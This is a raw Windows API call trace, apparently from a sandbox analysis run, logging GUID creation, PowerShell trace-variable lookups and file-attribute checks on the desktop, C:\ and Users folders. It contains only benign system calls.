	[0121.620] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x864d50d9, Data2=0x674e, Data3=0x41df, Data4=([0]=0xa7, [1]=0x4f, [2]=0xa, [3]=0xb, [4]=0x92, [5]=0xb3, [6]=0x62, [7]=0x53))) returned 0x0
	[0121.620] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xbb1ee1d1, Data2=0xdeff, Data3=0x4130, Data4=([0]=0xb2, [1]=0xaa, [2]=0x5c, [3]=0x63, [4]=0xf6, [5]=0xc5, [6]=0xf1, [7]=0x85))) returned 0x0
	[0121.621] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x102cdec0, Data2=0xbf48, Data3=0x4b91, Data4=([0]=0x9c, [1]=0x4b, [2]=0x11, [3]=0xc2, [4]=0x8e, [5]=0x8c, [6]=0xdc, [7]=0xb8))) returned 0x0
	[0121.621] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xdf2582e5, Data2=0xa28f, Data3=0x45c7, Data4=([0]=0x8b, [1]=0x22, [2]=0xbd, [3]=0x36, [4]=0x1b, [5]=0x71, [6]=0x78, [7]=0x5b))) returned 0x0
	[0121.622] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xf5ee5f06, Data2=0x857d, Data3=0x4dcf, Data4=([0]=0xa1, [1]=0xf9, [2]=0xef, [3]=0x3f, [4]=0xb8, [5]=0xc1, [6]=0x5d, [7]=0x29))) returned 0x0
	[0121.622] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x86b0e36c, Data2=0x5e6e, Data3=0x482e, Data4=([0]=0x95, [1]=0x7, [2]=0x9e, [3]=0x5, [4]=0xde, [5]=0x4c, [6]=0x97, [7]=0x26))) returned 0x0
	[0121.622] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xfa5fcf12, Data2=0xaeef, Data3=0x42f4, Data4=([0]=0xb2, [1]=0xf4, [2]=0xde, [3]=0x60, [4]=0x35, [5]=0x47, [6]=0xb8, [7]=0xe8))) returned 0x0
	[0121.623] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x438278fd, Data2=0x7884, Data3=0x48ff, Data4=([0]=0xa3, [1]=0x57, [2]=0x96, [3]=0xbb, [4]=0x87, [5]=0x93, [6]=0xdf, [7]=0xbc))) returned 0x0
	[0121.623] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xff09bfd7, Data2=0x76d3, Data3=0x45c8, Data4=([0]=0xa0, [1]=0x45, [2]=0x66, [3]=0x4b, [4]=0xfe, [5]=0x7b, [6]=0x31, [7]=0xb3))) returned 0x0
	[0121.624] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x626c6366, Data2=0xf5cc, Data3=0x4f3b, Data4=([0]=0xa2, [1]=0xb0, [2]=0xe4, [3]=0x4e, [4]=0xc8, [5]=0x7c, [6]=0x49, [7]=0x5a))) returned 0x0
	[0121.624] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xb66808db, Data2=0xcf9c, Data3=0x4c27, Data4=([0]=0xa7, [1]=0x60, [2]=0x4e, [3]=0x24, [4]=0x76, [5]=0xe, [6]=0xc8, [7]=0xcd))) returned 0x0
	[0121.624] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x652c914a, Data2=0xbb2f, Data3=0x4595, Data4=([0]=0x95, [1]=0x1f, [2]=0x8c, [3]=0x87, [4]=0xc0, [5]=0x3d, [6]=0x3c, [7]=0xac))) returned 0x0
	[0121.624] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xc2769109, Data2=0x8867, Data3=0x47e3, Data4=([0]=0x88, [1]=0x65, [2]=0x2, [3]=0xb7, [4]=0x25, [5]=0x52, [6]=0x89, [7]=0xa4))) returned 0x0
	[0121.625] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x7315fb4f, Data2=0x80d8, Data3=0x44fa, Data4=([0]=0xad, [1]=0x7f, [2]=0x63, [3]=0xe5, [4]=0x40, [5]=0x4f, [6]=0xd9, [7]=0x24))) returned 0x0
	[0121.625] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xb671c41d, Data2=0xa8c8, Data3=0x4529, Data4=([0]=0x81, [1]=0x4f, [2]=0xcc, [3]=0x5d, [4]=0xd5, [5]=0x7f, [6]=0x9c, [7]=0xe1))) returned 0x0
	[0121.626] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xc0d6f36, Data2=0x7ce9, Data3=0x4ca8, Data4=([0]=0xa3, [1]=0x5b, [2]=0x7e, [3]=0x79, [4]=0x59, [5]=0x2c, [6]=0x56, [7]=0x26))) returned 0x0
	[0121.626] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xc77356fb, Data2=0xfe9d, Data3=0x48d6, Data4=([0]=0x94, [1]=0x0, [2]=0x91, [3]=0x61, [4]=0x65, [5]=0xd9, [6]=0xa5, [7]=0x9a))) returned 0x0
	[0121.626] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xc25734de, Data2=0x18dc, Data3=0x4f1d, Data4=([0]=0xa5, [1]=0xcd, [2]=0x7b, [3]=0xd3, [4]=0x76, [5]=0x83, [6]=0x92, [7]=0x29))) returned 0x0
	[0121.627] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x9f0cd58b, Data2=0x539d, Data3=0x49e7, Data4=([0]=0x87, [1]=0xab, [2]=0x75, [3]=0xb6, [4]=0x14, [5]=0x1f, [6]=0x94, [7]=0x5d))) returned 0x0
	[0121.627] VirtualQuery (in: lpAddress=0xedd89530, lpBuffer=0xd7edd8a3f0, dwLength=0x30 | out: lpBuffer=0xd7edd8a3f0*(BaseAddress=0xedd89000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0xd6fff87000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0121.628] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xcec742c9, Data2=0x2e94, Data3=0x4999, Data4=([0]=0xb6, [1]=0xf8, [2]=0xb9, [3]=0xd6, [4]=0xb3, [5]=0x4, [6]=0x2, [7]=0xb7))) returned 0x0
	[0121.628] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xa8f39b1e, Data2=0x65bd, Data3=0x47c7, Data4=([0]=0xa1, [1]=0x2d, [2]=0x1d, [3]=0x37, [4]=0x2a, [5]=0x57, [6]=0xf4, [7]=0x26))) returned 0x0
	[0121.628] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x3020ca4f, Data2=0xe084, Data3=0x4017, Data4=([0]=0x87, [1]=0x90, [2]=0xaa, [3]=0xd3, [4]=0xb0, [5]=0xda, [6]=0x86, [7]=0xaf))) returned 0x0
	[0121.629] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x3ea93027, Data2=0xe5f7, Data3=0x435c, Data4=([0]=0x8e, [1]=0xe1, [2]=0x21, [3]=0x5f, [4]=0x63, [5]=0x8a, [6]=0xff, [7]=0x48))) returned 0x0
	[0121.629] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x7a0525a, Data2=0x90dc, Data3=0x44b2, Data4=([0]=0x8c, [1]=0xcd, [2]=0x2d, [3]=0xfd, [4]=0x3f, [5]=0x43, [6]=0xd, [7]=0x98))) returned 0x0
	[0121.629] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xd2896629, Data2=0x25f2, Data3=0x45f6, Data4=([0]=0x94, [1]=0x9d, [2]=0x8c, [3]=0xb7, [4]=0x70, [5]=0x10, [6]=0x2e, [7]=0xe1))) returned 0x0
	[0121.630] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xdf07d6b3, Data2=0x425e, Data3=0x444a, Data4=([0]=0x9e, [1]=0x9, [2]=0xaa, [3]=0x8e, [4]=0x60, [5]=0x2e, [6]=0xd3, [7]=0x7b))) returned 0x0
	[0121.630] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x9009349f, Data2=0x6bdc, Data3=0x448e, Data4=([0]=0xac, [1]=0x69, [2]=0xd1, [3]=0x4b, [4]=0x6a, [5]=0x8d, [6]=0x69, [7]=0xce))) returned 0x0
	[0121.631] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x63c55d0b, Data2=0xf640, Data3=0x4c06, Data4=([0]=0x8f, [1]=0x86, [2]=0x8b, [3]=0x29, [4]=0x30, [5]=0xf, [6]=0x99, [7]=0x2b))) returned 0x0
	[0121.631] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xbaa8a810, Data2=0x41bb, Data3=0x4082, Data4=([0]=0x96, [1]=0xe2, [2]=0xdb, [3]=0xd4, [4]=0xe2, [5]=0x8, [6]=0x98, [7]=0x1e))) returned 0x0
	[0121.631] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x984dceab, Data2=0xfc9, Data3=0x4f19, Data4=([0]=0x86, [1]=0xa4, [2]=0xc1, [3]=0x4a, [4]=0x4e, [5]=0x12, [6]=0xc3, [7]=0x11))) returned 0x0
	[0121.631] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x2af0ffcb, Data2=0xd861, Data3=0x421c, Data4=([0]=0x89, [1]=0xd1, [2]=0xf0, [3]=0x2c, [4]=0xe1, [5]=0x9f, [6]=0x27, [7]=0xad))) returned 0x0
	[0121.632] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x3c8dcfd9, Data2=0x93aa, Data3=0x49c5, Data4=([0]=0x88, [1]=0x7d, [2]=0xbf, [3]=0xa3, [4]=0x3c, [5]=0x67, [6]=0xa1, [7]=0x6f))) returned 0x0
	[0121.632] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x55367521, Data2=0x5432, Data3=0x4aa9, Data4=([0]=0x9f, [1]=0x61, [2]=0xdd, [3]=0x35, [4]=0xa9, [5]=0xad, [6]=0x48, [7]=0x63))) returned 0x0
	[0121.669] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x659433d5, Data2=0x5df4, Data3=0x4fb9, Data4=([0]=0xbb, [1]=0xe9, [2]=0x84, [3]=0xe7, [4]=0x0, [5]=0xb3, [6]=0x12, [7]=0xc9))) returned 0x0
	[0121.669] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x2f7c1b98, Data2=0x26f8, Data3=0x4341, Data4=([0]=0x84, [1]=0x8d, [2]=0xde, [3]=0xa1, [4]=0xe5, [5]=0x7e, [6]=0xc6, [7]=0x67))) returned 0x0
	[0121.669] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xc3d114bf, Data2=0xc37a, Data3=0x4719, Data4=([0]=0xb5, [1]=0x24, [2]=0x26, [3]=0x28, [4]=0xc4, [5]=0xd6, [6]=0x20, [7]=0x5e))) returned 0x0
	[0121.670] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x4eaf8b03, Data2=0x2e7f, Data3=0x487c, Data4=([0]=0xb0, [1]=0xf2, [2]=0x41, [3]=0xe, [4]=0xa2, [5]=0xc5, [6]=0xd9, [7]=0x3))) returned 0x0
	[0121.670] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xe77eabdc, Data2=0xb2ea, Data3=0x4025, Data4=([0]=0xb9, [1]=0xd9, [2]=0x3a, [3]=0xbf, [4]=0x30, [5]=0x5f, [6]=0x92, [7]=0xda))) returned 0x0
	[0121.670] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xce87d33b, Data2=0x8b8b, Data3=0x48e4, Data4=([0]=0xb5, [1]=0x60, [2]=0xb0, [3]=0x33, [4]=0xab, [5]=0xa0, [6]=0xc4, [7]=0xfb))) returned 0x0
	[0121.671] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x2bea5c9e, Data2=0x61c1, Data3=0x4bb2, Data4=([0]=0x98, [1]=0xdf, [2]=0xe4, [3]=0x6d, [4]=0x3c, [5]=0xf, [6]=0x10, [7]=0x97))) returned 0x0
	[0121.671] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x76c768a, Data2=0x9077, Data3=0x4501, Data4=([0]=0xaf, [1]=0x6f, [2]=0xa1, [3]=0xe6, [4]=0xe2, [5]=0x9a, [6]=0xd2, [7]=0xe5))) returned 0x0
	[0121.672] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xd3c786b2, Data2=0x8fb0, Data3=0x453f, Data4=([0]=0xab, [1]=0xaa, [2]=0xf2, [3]=0x40, [4]=0xef, [5]=0x5f, [6]=0xda, [7]=0x11))) returned 0x0
	[0121.672] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x5f7592f6, Data2=0x26c8, Data3=0x44bb, Data4=([0]=0xa4, [1]=0xe3, [2]=0xda, [3]=0x6a, [4]=0x90, [5]=0x30, [6]=0x16, [7]=0xfa))) returned 0x0
	[0121.672] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x16f1f8b7, Data2=0xa9e1, Data3=0x489d, Data4=([0]=0x86, [1]=0x91, [2]=0xfd, [3]=0x40, [4]=0x61, [5]=0x8, [6]=0x36, [7]=0x0))) returned 0x0
	[0121.672] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xdf9eb44, Data2=0x1a1e, Data3=0x44e7, Data4=([0]=0xa9, [1]=0xdd, [2]=0x2d, [3]=0xda, [4]=0x5, [5]=0x8e, [6]=0xc2, [7]=0x67))) returned 0x0
	[0121.673] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x23f3eceb, Data2=0x309c, Data3=0x443b, Data4=([0]=0xa7, [1]=0xfe, [2]=0x30, [3]=0x14, [4]=0x40, [5]=0x88, [6]=0x5f, [7]=0xf6))) returned 0x0
	[0121.673] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xba68bfab, Data2=0xc75a, Data3=0x4ea9, Data4=([0]=0x91, [1]=0x63, [2]=0x22, [3]=0xff, [4]=0x4b, [5]=0x54, [6]=0x58, [7]=0x8f))) returned 0x0
	[0121.673] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x2401d15e, Data2=0x106a, Data3=0x4264, Data4=([0]=0x8d, [1]=0xda, [2]=0x3b, [3]=0x83, [4]=0xb0, [5]=0x73, [6]=0xb7, [7]=0xe7))) returned 0x0
	[0121.674] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x967fc117, Data2=0x48c0, Data3=0x4a53, Data4=([0]=0x86, [1]=0x59, [2]=0xae, [3]=0x90, [4]=0x55, [5]=0x72, [6]=0x30, [7]=0x16))) returned 0x0
	[0121.674] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x8f1b00ee, Data2=0x3061, Data3=0x4619, Data4=([0]=0x8c, [1]=0xcc, [2]=0xac, [3]=0x42, [4]=0xe2, [5]=0x1c, [6]=0xeb, [7]=0x67))) returned 0x0
	[0121.674] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x82fc17b4, Data2=0xe18d, Data3=0x46dc, Data4=([0]=0x8a, [1]=0x4b, [2]=0x4a, [3]=0x93, [4]=0x5a, [5]=0x75, [6]=0x72, [7]=0x8f))) returned 0x0
	[0121.675] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xfe9edc6a, Data2=0x1216, Data3=0x4244, Data4=([0]=0xae, [1]=0xd0, [2]=0xee, [3]=0x41, [4]=0xe8, [5]=0xa4, [6]=0x91, [7]=0x8f))) returned 0x0
	[0121.675] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x92712dac, Data2=0xb6e9, Data3=0x473e, Data4=([0]=0xaf, [1]=0xfb, [2]=0x95, [3]=0x12, [4]=0xcf, [5]=0xd3, [6]=0x33, [7]=0x28))) returned 0x0
	[0121.675] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xc1c2645f, Data2=0x1850, Data3=0x4ef1, Data4=([0]=0xa8, [1]=0x24, [2]=0xc5, [3]=0x14, [4]=0x89, [5]=0x16, [6]=0xa7, [7]=0x28))) returned 0x0
	[0121.676] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xbd04d593, Data2=0x2d87, Data3=0x49e4, Data4=([0]=0x9e, [1]=0x4a, [2]=0x1f, [3]=0x50, [4]=0x37, [5]=0xc3, [6]=0x82, [7]=0x21))) returned 0x0
	[0121.676] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xb17d2d61, Data2=0x1d48, Data3=0x452b, Data4=([0]=0xaa, [1]=0xe2, [2]=0xa3, [3]=0xda, [4]=0xc3, [5]=0x90, [6]=0x5d, [7]=0x36))) returned 0x0
	[0121.676] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x5243f50c, Data2=0xdd39, Data3=0x47c6, Data4=([0]=0xbe, [1]=0x89, [2]=0xc7, [3]=0x11, [4]=0x5c, [5]=0x37, [6]=0xe3, [7]=0xa6))) returned 0x0
	[0121.677] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x4cea3243, Data2=0xfd7b, Data3=0x4b8a, Data4=([0]=0xb6, [1]=0x28, [2]=0x45, [3]=0x73, [4]=0xff, [5]=0x5c, [6]=0x85, [7]=0x56))) returned 0x0
	[0121.678] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x2078ca89, Data2=0xa601, Data3=0x4270, Data4=([0]=0xad, [1]=0x87, [2]=0x3b, [3]=0x1, [4]=0xcc, [5]=0x98, [6]=0x9d, [7]=0x3f))) returned 0x0
	[0121.679] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x8492642b, Data2=0x12a8, Data3=0x47e7, Data4=([0]=0x99, [1]=0xc4, [2]=0xde, [3]=0xc1, [4]=0x23, [5]=0x1e, [6]=0x49, [7]=0x75))) returned 0x0
	[0121.680] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xe40f536d, Data2=0xeb56, Data3=0x4696, Data4=([0]=0x8c, [1]=0xae, [2]=0xeb, [3]=0xbc, [4]=0x91, [5]=0xbb, [6]=0xc4, [7]=0x63))) returned 0x0
	[0121.684] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d542f0
	[0121.684] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d542f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0121.684] CoTaskMemFree (pv=0x2ad22d542f0) 
	[0121.686] CoTaskMemAlloc (cb=0x20e) returned 0x2ad22d501d0
	[0121.686] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x2ad22d501d0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop") returned 0x19
	[0121.686] CoTaskMemFree (pv=0x2ad22d501d0) 
	[0121.687] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d55610
	[0121.687] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d55610, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0121.687] CoTaskMemFree (pv=0x2ad22d55610) 
	[0121.694] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d55e90
	[0121.694] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d55e90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0121.694] CoTaskMemFree (pv=0x2ad22d55e90) 
	[0121.695] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d54c80
	[0121.695] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d54c80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0121.695] CoTaskMemFree (pv=0x2ad22d54c80) 
	[0121.696] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Desktop", nBufferLength=0x105, lpBuffer=0xd7edd8a6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop", lpFilePart=0x0) returned 0x19
	[0121.696] SetErrorMode (uMode=0x1) returned 0x8001
	[0121.696] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Desktop" (normalized: "c:\\users\\nd9e1fyi\\desktop"), fInfoLevelId=0x0, lpFileInformation=0xd7edd8a950 | out: lpFileInformation=0xd7edd8a950*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x1f6119c0, ftCreationTime.dwHighDateTime=0x1d30b90, ftLastAccessTime.dwLowDateTime=0x730fc777, ftLastAccessTime.dwHighDateTime=0x1d40d90, ftLastWriteTime.dwLowDateTime=0x730fc777, ftLastWriteTime.dwHighDateTime=0x1d40d90, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0121.696] SetErrorMode (uMode=0x8001) returned 0x1
	[0121.696] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Desktop", nBufferLength=0x105, lpBuffer=0xd7edd8a6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop", lpFilePart=0x0) returned 0x19
	[0121.696] SetErrorMode (uMode=0x1) returned 0x8001
	[0121.696] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Desktop" (normalized: "c:\\users\\nd9e1fyi\\desktop"), fInfoLevelId=0x0, lpFileInformation=0xd7edd8a950 | out: lpFileInformation=0xd7edd8a950*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x1f6119c0, ftCreationTime.dwHighDateTime=0x1d30b90, ftLastAccessTime.dwLowDateTime=0x730fc777, ftLastAccessTime.dwHighDateTime=0x1d40d90, ftLastWriteTime.dwLowDateTime=0x730fc777, ftLastWriteTime.dwHighDateTime=0x1d40d90, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0121.696] SetErrorMode (uMode=0x8001) returned 0x1
	[0121.697] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d54d90
	[0121.697] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d54d90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0121.697] CoTaskMemFree (pv=0x2ad22d54d90) 
	[0121.701] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Desktop", nBufferLength=0x105, lpBuffer=0xd7edd8a890, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop", lpFilePart=0x0) returned 0x19
	[0121.702] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xd7edd8a700, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0121.702] SetErrorMode (uMode=0x1) returned 0x8001
	[0121.702] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xd7edd8a910 | out: lpFileInformation=0xd7edd8a910*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x31b3b9e4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x95a116d6, ftLastAccessTime.dwHighDateTime=0x1d3a57f, ftLastWriteTime.dwLowDateTime=0x95a116d6, ftLastWriteTime.dwHighDateTime=0x1d3a57f, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0121.702] SetErrorMode (uMode=0x8001) returned 0x1
	[0121.702] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xd7edd8a700, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0121.702] SetErrorMode (uMode=0x1) returned 0x8001
	[0121.702] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xd7edd8a910 | out: lpFileInformation=0xd7edd8a910*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x31b3b9e4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x95a116d6, ftLastAccessTime.dwHighDateTime=0x1d3a57f, ftLastWriteTime.dwLowDateTime=0x95a116d6, ftLastWriteTime.dwHighDateTime=0x1d3a57f, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0121.702] SetErrorMode (uMode=0x8001) returned 0x1
	[0121.702] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xd7edd8a710, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0121.702] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xd7edd8a600, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0121.703] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0xd7edd8a700, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0121.703] SetErrorMode (uMode=0x1) returned 0x8001
	[0121.703] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0xd7edd8a910 | out: lpFileInformation=0xd7edd8a910*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x1f5eb76f, ftLastAccessTime.dwHighDateTime=0x1d30b90, ftLastWriteTime.dwLowDateTime=0x1f5eb76f, ftLastWriteTime.dwHighDateTime=0x1d30b90, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0121.703] SetErrorMode (uMode=0x8001) returned 0x1
	[0121.703] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0xd7edd8a700, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0121.703] SetErrorMode (uMode=0x1) returned 0x8001
	[0121.703] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0xd7edd8a910 | out: lpFileInformation=0xd7edd8a910*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x1f5eb76f, ftLastAccessTime.dwHighDateTime=0x1d30b90, ftLastWriteTime.dwLowDateTime=0x1f5eb76f, ftLastWriteTime.dwHighDateTime=0x1d30b90, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0121.703] SetErrorMode (uMode=0x8001) returned 0x1
	[0121.703] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0xd7edd8a710, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0121.703] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0xd7edd8a600, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0121.703] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi", nBufferLength=0x105, lpBuffer=0xd7edd8a700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi", lpFilePart=0x0) returned 0x11
	[0121.703] SetErrorMode (uMode=0x1) returned 0x8001
